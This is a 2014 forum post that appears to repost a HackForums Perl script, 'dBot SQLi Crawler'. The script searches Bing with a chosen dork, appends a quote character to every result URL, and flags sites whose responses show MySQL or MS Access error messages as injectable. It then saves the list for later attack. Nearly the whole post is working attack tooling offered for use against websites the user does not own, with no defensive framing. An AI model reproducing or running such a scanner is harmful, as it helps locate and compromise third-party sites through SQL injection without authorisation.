Romania- Posted August 9, 2014 Report Posted August 9, 2014 #!/usr/bin/perluse strict;use warnings;use HTTP::Request;use LWP::UserAgent;######my $dork;my $url;my $i;my $request;my $useragent;my $response;my $start;my $end;my $result;my $fl;my $link;my $req;my $ua;my $result2;my $res;my $save;my $pages;my $page;my $choice;######my @z;print q{ _ ____ _ | | _ \ | | __| | |_) | ___ | |_ / _` | _ < / _ \| __|| (_| | |_) | (_) | |_ \__,_|____/ \___/ \__|######## / SQLi Crawler / #### Private Edition #### ~Coded by dbx~ ########};MainMenu:print "------\n";print "Enter [1] To Begin SQLi.\n";print "Enter [2] To Exit.\n";print "------\n\n";print "Your Choice: ";chomp ($choice = <STDIN>);print "\n";if ($choice eq 1) {&sql_scan}if ($choice eq 5) {die;}sub sql_scan{print "[+] Enter Bing! dork: ";chomp ($dork = <STDIN>);print "\n";print "[+] How Many Pages To Leech?: ";chomp ($pages = <STDIN>);print "\n";$page = $pages.'1';print "[~] Crawling...\n\n";for ($i = 0; $i <= $page; $i=$i+11){$url = "http://www.bing.com/search?q=$dork&go=&qs=n&sk=&sc=8-13&first=$i";$request = HTTP::Request->new(GET => $url);$useragent = LWP::UserAgent->new();$response = $useragent->request($request);$result = $response->content;$start = '<h3><a href="';$end = '" onmousedown=';while ($result =~ m/$start(.*?)$end/g){ $fl = $1; $link = $fl."%27"; $req = HTTP::Request->new(GET => $link); $ua = LWP::UserAgent->new(); $res = $ua->request($req); $result2 = $res->content; if ($result2=~ m/You have an error in your SQL syntax/i || $result2=~ m/Query failed/i || $result2=~ m/SQL query failed/i || $result2=~ m/mysql_fetch_/i || $result2=~ m/mysql_fetch_array/i || $result2 =~ m/mysql_num_rows/i || $result2 =~ m/The used SELECT statements have a different number of columns/i ) { push @z, $link; print "[+] MySQL Vulnerable: $link\n\n"; } elsif ($result2 =~ m/Microsoft JET Database/i || $result2 =~ m/ODBC Microsoft Access Driver/i ) { push @z, $link; print "[+] MsSQL Vulnerable: $link\n\n"; } else { print "[-] $link <- Not Vulnerable\n\n"; }}} print "Vulnerable Links:\n"; print "------\n";foreach (@z){ print "$_ \n\n";}print "Save Into A Text File? (Y or N): ";chomp ($save = <STDIN>);if ($save eq 'Y'){ print "Saving File...\n\n"; open(vuln_file, ">>Vulns.txt"); foreach (@z) { print vuln_file "$_ \n"; } close(vuln_file); print "File Saved!\n\n";}goto MainMenu;} Source : http://www.hackforums.net/showthread.php?tid=4198784 Quote
